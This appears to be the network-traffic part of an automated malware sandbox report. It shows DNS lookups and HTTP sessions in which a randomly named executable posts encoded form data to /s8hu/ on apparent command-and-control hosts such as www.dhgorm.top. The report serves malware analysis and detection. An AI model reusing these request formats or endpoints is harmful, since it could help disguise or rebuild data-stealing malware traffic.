                                            Apr 19, 2024 19:13:04.721796036 CEST4972180192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:04.721839905 CEST4972180192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:06.068514109 CEST4972180192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:07.477880001 CEST4972280192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:07.644556046 CEST8049722108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:07.644763947 CEST4972280192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:07.646962881 CEST4972280192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:07.813668013 CEST8049722108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:07.814277887 CEST8049722108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:07.814342976 CEST8049722108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:07.814358950 CEST8049722108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:07.814374924 CEST8049722108.186.14.193192.168.2.5
                                            Apr 19, 2024 19:13:07.814404964 CEST4972280192.168.2.5108.186.14.193
                                            Apr 19, 2024 19:13:07.814511061 CEST4972280192.168.2.5108.186.14.193

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 19, 2024 19:12:44.080056906 CEST5133453192.168.2.51.1.1.1
                                            Apr 19, 2024 19:12:44.625847101 CEST53513341.1.1.1192.168.2.5
                                            Apr 19, 2024 19:13:00.621352911 CEST6513953192.168.2.51.1.1.1
                                            Apr 19, 2024 19:13:01.632215023 CEST6513953192.168.2.51.1.1.1
                                            Apr 19, 2024 19:13:01.669574976 CEST53651391.1.1.1192.168.2.5
                                            Apr 19, 2024 19:13:01.736932993 CEST53651391.1.1.1192.168.2.5

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Apr 19, 2024 19:12:44.080056906 CEST192.168.2.51.1.1.10x11aaStandard query (0)www.66bm99.shopA (IP address)IN (0x0001)false
                                            Apr 19, 2024 19:13:00.621352911 CEST192.168.2.51.1.1.10x18bdStandard query (0)www.dhgorm.topA (IP address)IN (0x0001)false
                                            Apr 19, 2024 19:13:01.632215023 CEST192.168.2.51.1.1.10x18bdStandard query (0)www.dhgorm.topA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Apr 19, 2024 19:12:44.625847101 CEST1.1.1.1192.168.2.50x11aaNo error (0)www.66bm99.shopccxx.cat-dragon-diiojsofso.comCNAME (Canonical name)IN (0x0001)false
                                            Apr 19, 2024 19:12:44.625847101 CEST1.1.1.1192.168.2.50x11aaNo error (0)ccxx.cat-dragon-diiojsofso.com134.122.178.173A (IP address)IN (0x0001)false
                                            Apr 19, 2024 19:12:44.625847101 CEST1.1.1.1192.168.2.50x11aaNo error (0)ccxx.cat-dragon-diiojsofso.com134.122.178.172A (IP address)IN (0x0001)false
                                            Apr 19, 2024 19:12:44.625847101 CEST1.1.1.1192.168.2.50x11aaNo error (0)ccxx.cat-dragon-diiojsofso.com134.122.178.171A (IP address)IN (0x0001)false
                                            Apr 19, 2024 19:13:01.669574976 CEST1.1.1.1192.168.2.50x18bdNo error (0)www.dhgorm.top108.186.14.193A (IP address)IN (0x0001)false
                                            Apr 19, 2024 19:13:01.736932993 CEST1.1.1.1192.168.2.50x18bdNo error (0)www.dhgorm.top108.186.14.193A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • www.66bm99.shop
                                            • www.dhgorm.top

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.549719134.122.178.173804752C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 19, 2024 19:12:45.015360117 CEST401OUTGET /s8hu/?UPVdm=spiDyH1b3uFUsTZxkISg08MBQMtSMA3+DyfgsgsxVWVMb+cPydsAHF754/iEUPAVeA5OBQjW9+XTnykROPWO/pmJGuCBnJv2R6Kqa3nD4OdTG3fimHjEv0IbRXA2Kbqi0w==&4tDdP=cl18T6Ap HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                            Accept-Language: en-US,en
                                            Host: www.66bm99.shop
                                            Connection: close
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                            Apr 19, 2024 19:12:45.520473003 CEST1289INHTTP/1.1 200 OK
                                            Date: Fri, 19 Apr 2024 17:12:45 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            Vary: Accept-Encoding
                                            Access-Control-Allow-Origin: *
                                            Server: cdn-ddos-cc
                                            X-Cache-Status: MISS
                                            Data Raw: 31 63 38 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 20 64 61 74 61 2d 62 75 69 6c 64 74 69 6d 65 3d 22 34 2f 31 36 2f 32 30 32 34 2c 20 31 35 3a 33 38 3a 35 32 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6e 65 78 74 2d 66 6f 6e 74 2d 70 72 65 63 6f 6e 6e 65 63 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 63 65 2d 72 65 6e 64 65 72 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 68 2d 43 4e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 66 66 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 66 75 6c 6c 73 63 72 65 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 78 35 2d 6f 72 69 65 6e 74 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6f 72 74 72 61 69 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 74 72 61 6e 73 6c 61 74 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 73 63 72 65 65 6e 2d 6f 72 69 65 6e 74 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 70 6f 72 74 72 61 69 74 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 2e 63 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20
                                            Data Ascii: 1c84<!DOCTYPE html><html lang="zh-CN" data-buildtime="4/16/2024, 15:38:52"> <head> <meta charset="utf-8"> <title></title> <meta name="next-font-preconnect"> <meta name="renderer" content="webkit"> <meta name="force-rendering" content="webkit"> <meta http-equiv="Content-Language" content="zh-CN"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="theme-color" content="#fff"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="apple-touch-fullscreen" content="yes"> <meta name="referrer" content="origin"> <meta name="x5-orientation" content="portrait"> <meta name="google" content="notranslate"> <meta name="screen-orientation" content="portrait"> <meta name="apple-mobile-web-app-capable" content="yes"> <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cover"> ... --> <style> .con { width: 100%; height: 100%;
                                            Apr 19, 2024 19:12:45.521181107 CEST1289INData Raw: 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 63 6d 73 2d 70 72 69 6d 61 72 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 29 3b 0a 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 0a 20 20 20 20
                                            Data Ascii: background: var(--cms-primary-background-color); position: fixed; left: 0; top: 0; display: flex; justify-content: center; align-items: center; } .loading { display: block
                                            Apr 19, 2024 19:12:45.521265984 CEST1289INData Raw: 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 2e 61 6e 74 2d 6d 65 73 73 61 67 65 2d 65 72 72 6f 72 20 2e 61 6e 74 69 63 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e
                                            Data Ascii: ay: none !important; } .ant-message-error .anticon { background: #cf2f22 !important; color: white !important; border-radius: 16px; border: 1px solid #cf2f22 !important; } .ant-message-suc
                                            Apr 19, 2024 19:12:45.522113085 CEST1289INData Raw: 7d 29 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 5f 54 5f 29 29 3b 0a 20 20 20 20 20 20 7d 29 28 4f 62 6a 65 63 74 29 3b 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 77
                                            Data Ascii: }), _T_)); })(Object); </script> <script> window.CONFIG={"name":"kc305-1","tenant":"kc305","api":"","assets":"kc305-1","sitename":"BM","theme":"default","themeH5":"mobileDefault","isEncryOpen":true,
                                            Apr 19, 2024 19:12:45.522998095 CEST1289INData Raw: 4d 6f 62 69 6c 65 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 69 73 41 67 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 43 4f 4e 46 49 47 20 26 26 20 77 69 6e 64 6f 77 2e 43 4f 4e 46 49 47 2e 69 73 41 67 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20
                                            Data Ascii: Mobile; var isAgent = window.CONFIG && window.CONFIG.isAgent; var isMobileH5 = /\/m|\/m\//i.test(location.pathname); if (isMobile && !isHost && !isMobileH5 && !isStatic) { var base = location.pathname + locati
                                            Apr 19, 2024 19:12:45.523045063 CEST1112INData Raw: 65 2e 65 72 72 6f 72 28 22 73 65 72 76 69 63 65 20 77 6f 72 6b 65 72 20 e5 8d b8 e8 bd bd e6 88 90 e5 8a 9f 3a 20 22 2c 20 72 65 67 69 73 74 72 61 74 69 6f 6e 45 72 72 6f 72 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 0a 20 20 20 20
                                            Data Ascii: e.error("service worker : ", registrationError); }) .catch(function (registrationError) { console.log("service worker : ", registrationError); }); }
                                            Apr 19, 2024 19:12:45.553004980 CEST707INData Raw: 32 62 37 0d 0a 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 64 64 64 64 22 29 3b 0a 20 20 76 61 72 20 61 6e 61 6c 79 7a 65 20 3d 20 77 69 6e 64 6f 77 2e 43 4f 4e 46 49 47 3f 2e 69 6e 6a 65 63 74 41 6e 61 6c 79 7a 65 3b 0a 20 20 76 61 72 20 69 73
                                            Data Ascii: 2b7classList.add("dddd"); var analyze = window.CONFIG?.injectAnalyze; var isAgent = window.CONFIG?.isAgent; if (analyze && !isAgent) { var predomain = location.host.replace("www.", ""); var analyzecode = analyze[predomain] || a


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.549720108.186.14.193804752C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 19, 2024 19:13:01.854305029 CEST649OUTPOST /s8hu/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                            Accept-Encoding: gzip, deflate
                                            Accept-Language: en-US,en
                                            Host: www.dhgorm.top
                                            Origin: http://www.dhgorm.top
                                            Referer: http://www.dhgorm.top/s8hu/
                                            Cache-Control: no-cache
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Content-Length: 206
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                            Data Raw: 55 50 56 64 6d 3d 68 6c 4d 73 61 61 61 33 42 41 6b 50 55 4e 4f 41 34 30 6e 2b 38 6d 75 2f 63 65 52 65 36 6d 66 66 4f 76 73 4c 65 70 31 55 2f 6e 5a 72 56 4c 50 41 46 73 64 75 5a 54 74 6a 4c 35 5a 65 34 78 6d 63 4b 38 46 6c 41 71 51 53 45 5a 39 6c 56 52 63 4b 2b 77 34 77 46 46 42 70 47 70 6d 6f 75 55 7a 77 69 7a 45 65 43 72 32 79 61 53 2f 6b 4f 56 37 38 4c 75 46 49 49 76 75 6a 59 58 36 6c 58 77 41 6e 4d 54 39 64 61 61 55 72 59 47 58 54 4e 4f 66 39 55 69 62 46 4c 72 35 6b 48 73 4d 45 47 68 61 67 68 56 76 78 76 2b 35 52 50 70 36 61 6f 73 57 63 48 67 78 6b 4e 71 75 70 76 6b 62 73 78 46 75 61 63 6b 32 6b 4c 66 73 3d
                                            Data Ascii: UPVdm=hlMsaaa3BAkPUNOA40n+8mu/ceRe6mffOvsLep1U/nZrVLPAFsduZTtjL5Ze4xmcK8FlAqQSEZ9lVRcK+w4wFFBpGpmouUzwizEeCr2yaS/kOV78LuFIIvujYX6lXwAnMT9daaUrYGXTNOf9UibFLr5kHsMEGhaghVvxv+5RPp6aosWcHgxkNqupvkbsxFuack2kLfs=
                                            Apr 19, 2024 19:13:02.022003889 CEST240INHTTP/1.1 200 OK
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Encoding: gzip
                                            Server: Nginx Microsoft-HTTPAPI/2.0
                                            X-Powered-By: Nginx
                                            Date: Fri, 19 Apr 2024 17:13:01 GMT
                                            Connection: close
                                            Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                            Data Ascii: a
                                            Apr 19, 2024 19:13:02.022036076 CEST464INData Raw: 31 63 39 0d 0a a5 52 31 8f d3 30 14 de f3 2b 2c 2f 49 24 6a 83 58 e8 b5 ee 70 88 f5 c4 70 1b 62 70 1c 37 f1 e1 c4 c6 7e 69 da a2 1b 3b 20 90 ee 26 d0 49 30 b1 f2 03 90 40 e2 cf d0 0a 26 fe 02 4e 13 ee 7a 08 26 2c d9 96 ed f7 7d ef fb de f3 cf cf
                                            Data Ascii: 1c9R10+,/I$jXppbp7~i; &I0@&Nz&,}_%T-+]{K{DiO+xL]ER<l^8eaTd/o7?lv/wov^n>n/>)Qm$7jCSCH'A.v'HyFFGZ2uPPfC#-S
                                            Apr 19, 2024 19:13:02.022053957 CEST13INData Raw: 38 0d 0a 9c 67 22 a1 1a 03 00 00 0d 0a
                                            Data Ascii: 8g"
                                            Apr 19, 2024 19:13:02.022073030 CEST5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            2192.168.2.549721108.186.14.193804752C:\Program Files (x86)\skZQuOaqIrqrABWjzYdCtoiNbZuGAreBRBKhBPifaaRzMCqhlxGcCxnfXGZpsdUOdRAI\gxDswOWWlPEzerVr.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 19, 2024 19:13:04.554280043 CEST669OUTPOST /s8hu/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                            Accept-Encoding: gzip, deflate
                                            Accept-Language: en-US,en
                                            Host: www.dhgorm.top
                                            Origin: http://www.dhgorm.top
                                            Referer: http://www.dhgorm.top/s8hu/
                                            Cache-Control: no-cache
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Content-Length: 226
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                            Data Raw: 55 50 56 64 6d 3d 68 6c 4d 73 61 61 61 33 42 41 6b 50 55 74 65 41 37 58 50 2b 2b 47 75 38 42 75 52 65 77 47 66 54 4f 76 67 4c 65 6f 78 2b 2b 56 39 72 56 76 4c 41 45 75 6c 75 61 54 74 6a 44 5a 59 56 33 52 6e 78 4b 37 4e 58 41 72 73 53 45 5a 35 6c 56 52 4d 4b 2f 41 45 7a 45 56 42 76 41 70 6d 71 6b 30 7a 77 69 7a 45 65 43 72 69 4d 61 53 6e 6b 4e 6c 4c 38 49 4c 78 4c 42 50 75 73 50 6e 36 6c 64 51 41 6a 4d 54 39 46 61 62 49 4e 59 45 76 54 4e 4f 76 39 61 54 62 45 42 72 35 69 59 38 4e 45 57 30 6e 30 74 30 4f 36 79 4f 77 6b 5a 62 36 5a 67 36 37 32 64 43 35 4d 65 4b 43 52 2f 33 54 62 67 31 50 7a 47 48 6d 55 56 49 34 76 51 74 6d 38 36 38 69 66 32 54 2b 6a 62 64 41 4a 32 4b 5a 70
                                            Data Ascii: UPVdm=hlMsaaa3BAkPUteA7XP++Gu8BuRewGfTOvgLeox++V9rVvLAEuluaTtjDZYV3RnxK7NXArsSEZ5lVRMK/AEzEVBvApmqk0zwizEeCriMaSnkNlL8ILxLBPusPn6ldQAjMT9FabINYEvTNOv9aTbEBr5iY8NEW0n0t0O6yOwkZb6Zg672dC5MeKCR/3Tbg1PzGHmUVI4vQtm868if2T+jbdAJ2KZp
                                            Apr 19, 2024 19:13:04.721723080 CEST240INHTTP/1.1 200 OK
                                            Transfer-Encoding: chunked
                                            Content-Type: text/html; charset=UTF-8
                                            Content-Encoding: gzip
                                            Server: Nginx Microsoft-HTTPAPI/2.0
                                            X-Powered-By: Nginx
                                            Date: Fri, 19 Apr 2024 17:13:04 GMT
                                            Connection: close
                                            Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 04 00 0d 0a
                                            Data Ascii: a
                                            Apr 19, 2024 19:13:04.721739054 CEST464INData Raw: 31 63 39 0d 0a a5 52 31 8f d3 30 14 de f3 2b 2c 2f 49 24 6a 83 58 e8 b5 ee 70 88 f5 c4 70 1b 62 70 1c 37 f1 e1 c4 c6 7e 69 da a2 1b 3b 20 90 ee 26 d0 49 30 b1 f2 03 90 40 e2 cf d0 0a 26 fe 02 4e 13 ee 7a 08 26 2c d9 96 ed f7 7d ef fb de f3 cf cf
                                            Data Ascii: 1c9R10+,/I$jXppbp7~i; &I0@&Nz&,}_%T-+]{K{DiO+xL]ER<l^8eaTd/o7?lv/wov^n>n/>)Qm$7jCSCH'A.v'HyFFGZ2uPPfC#-S
                                            Apr 19, 2024 19:13:04.721750975 CEST13INData Raw: 38 0d 0a 9c 67 22 a1 1a 03 00 00 0d 0a
                                            Data Ascii: 8g"
                                            Apr 19, 2024 19:13:04.721766949 CEST5INData Raw: 30 0d 0a 0d 0a
                                            Data Ascii: 0


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3192.168.2.549722108.186.14.19380
                                            TimestampBytes transferredDirectionData
                                            Apr 19, 2024 19:13:07.646962881 CEST1686OUTPOST /s8hu/ HTTP/1.1
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                            Accept-Encoding: gzip, deflate
                                            Accept-Language: en-US,en
                                            Host: www.dhgorm.top
                                            Origin: http://www.dhgorm.top
                                            Referer: http://www.dhgorm.top/s8hu/
                                            Cache-Control: no-cache
                                            Connection: close
                                            Content-Type: application/x-www-form-urlencoded
                                            Content-Length: 1242
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
                                            Data Raw: 55 50 56 64 6d 3d 68 6c 4d 73 61 61 61 33 42 41 6b 50 55 74 65 41 37 58 50 2b 2b 47 75 38 42 75 52 65 77 47 66 54 4f 76 67 4c 65 6f 78 2b 2b 56 31 72 56 63 54 41 46 50 6c 75 62 54 74 6a 4e 35 59 57 33 52 6d 7a 4b 36 6f 63 41 72 68 76 45 62 78 6c 55 79 55 4b 32 54 63 7a 4e 56 42 76 43 70 6d 72 75 55 7a 66 69 7a 30 61 43 72 79 4d 61 53 6e 6b 4e 6a 6e 38 65 75 46 4c 48 50 75 6a 59 58 36 70 58 77 41 66 4d 54 56 2f 61 62 38 37 59 33 6e 54 4e 75 2f 39 58 46 50 45 62 72 35 67 5a 38 4e 71 57 30 6a 43 74 30 54 46 79 4e 73 4b 5a 5a 36 5a 67 38 47 72 4e 42 77 53 41 36 47 69 39 30 4c 4f 34 56 54 6a 4d 6b 36 2f 65 5a 4a 4b 54 4f 79 33 76 38 6e 62 34 33 33 58 42 5a 52 62 33 2f 39 6a 37 6d 54 6a 75 50 54 4f 6e 2b 42 59 34 73 66 6f 62 4c 76 63 77 4e 66 73 6c 77 38 45 58 6b 67 4d 49 65 4a 37 36 4e 52 43 37 6b 4a 74 6b 49 52 56 2f 65 61 49 33 77 58 56 33 75 78 41 74 43 7a 65 35 73 32 2b 6d 2f 34 61 30 2f 63 66 58 44 41 74 38 56 68 35 63 49 70 77 4b 4c 78 38 58 53 6f 54 4d 34 32 5a 59 39 41 58 4b 64 35 31 6f 79 4c 67 4a 50 6d 47 44 4c 44 61 79 6a 6c 67 76 7a 55 31 6e 4b 6c 69 4f 57 2b 45 6a 35 55 32 46 32 30 4b 65 6b 6f 4b 6c 33 76 2f 4e 4e 68 63 4c 66 6f 46 78 5a 7a 30 49 58 4b 64 77 50 46 6e 76 31 75 50 39 5a 64 47 67 30 4a 56 52 38 41 5a 61 46 37 58 70 36 39 4d 6b 67 56 45 64 6f 68 46 4d 35 53 4d 75 70 6a 64 57 2b 45 72 58 73 4a 74 4d 76 32 69 6f 62 77 38 6f 47 2b 4d 48 32 75 51 2b 64 33 54 36 6d 37 72 53 49 55 54 47 76 72 44 37 56 34 65 30 4b 50 36 4d 46 51 44 66 46 4e 52 44 34 66 5a 45 55 50 33 32 7a 58 72 6f 2f 73 78 58 57 35 77 4e 65 77 53 36 6a 38 4b 4c 37 61 46 4a 67 4c 50 69 50 32 2b 6f 77 7a 6e 4b 45 2f 36 6f 6d 31 34 44 59 73 4e 32 2b 75 2b 44 6e 30 6d 36 33 74 6a 67 43 39 6c 38 2f 45 35 71 57 6f 74 43 33 45 41 6b 64 47 45 7a 79 72 77 49 72 72 31 62 67 4b 4b 4d 4d 30 6b 6a 57 42 59 4c 6e 53 59 4f 68 62 6c 4b 6a 50 46 33 78 71 75 6c 48 77 41 2b 4e 77 45 54 42 37 35 74 79 79 32 54 41 76 36 67 66 6a 72 73 79 5a 63 34 48 77 51 5a 44 79 42 6d 62 47 2f 38 50 33 42 6e 43 7a 47 44 47 47 30 72 4a 34 77 30 4a 58 47 6a 37 4b 77 72 31 64 58 6d 77 77 47 68 36 69 47 62 75 77 44 52 61 72 73 57 2b 6f 36 63 57 41 48 5a 44 6a 77 6d 2b 6b 46 70 76 71 54 4b 36 73 42 4d 37 38 6f 6f 72 48 56 45 52 71 48 57 75 53 5a 6a 73 74 59 43 62 44 4f 39 68 37 55 55 77 6c 70 39 33 31 77 58 79 74 67 47 51 70 43 36 6e 45 45 4e 79 67 69 30 35 67 75 58 6d 64 61 43 42 49 42 61 42 76 47 64 6a 7a 35 44 6a 62 38 66 46 76 6e 37 48 53 6d 45 48 74 42 68 50 43 76 59 72 47 79 4e 4e 33 62 39 68 4a 57 44 68 67 72 38 43 32 64 6c 52 36 5a 41 6c 59 34 38 4c 33 65 32 66 51 61 6c 49 38 45 4f 57 2b 55 2b 57 78 64 67 41 66 55 59 42 6a 41 6b 72 4a 6b 57 4d 46 77 57 76 4f 51 30 76 52 42 47 72 32 34 74 70 4d 38 79 65 66 48 78 48 4f 79 33 44 36 72 54 63 73 57 39 41 4c 63 4f 66 58 37 76 5a 71 79 47 43 79 44 48 64 67 65 59 39 4b 6d 37 64 58 41 66 65 46 49 70 34 4a 41 73 37 69 47 47 65 47 57 42 6e 77 2b 33 6b 65 32 4b 48 2f 70 7a 52 63 48 48 37 32 30 74 49 48 55 73 33 46 7a 52 72 2b 6c 73 48 64 47 46 65 49 31 67 33 62 38 6c 62 6c 51 4d 4c 66 63 59 76 46 70 2b 52 53 2f 79 66 2f 42 77 6f 36 71 5a 54 41 4e 50 4d 63 65 53 7a 6a 76 37 71 4e 74 44 39 6a 43 41 71 70 6d 51 59 51 77 6c 6a 70 75 6f 6a 73 7a 53 49 44 49 53 37 7a 70 67 68 77 68 4e 33 33 52 4e 5a 37 36 41 53 33 39 78 67 5a 55 48 45 62 63 74 68 62 44 46 51 2f 4c 46 33 69 44 55 30 45 78 37 37 4d 31 42 70 75 68 46 56 2b 47 72 63 4c 39 49 33 51 7a 72 6a 36 2b 2f 49 43 73 49 6b 33 50 34 46 6e 50 76 61 76 55 79 62 2b 6c 4c 73 4a 78 78 5a 57 56 4f 41 6f 37 67 73 51 62 4a 68 7a 53 65 54 45 63 5a 6c 6d 31 37 6a 75 2b 6f 65 31 33 58 72 66 4a 38 69 68 79 78 33 77 6b 44 4b 65 42 66 4d 33 79 54 36 46 2b 68 62 4b 31 31 34 35 34 63 51 69 61 59 2b 49 78 6f 34 57 4f 4c 55 4c 52 6e 67 3d 3d
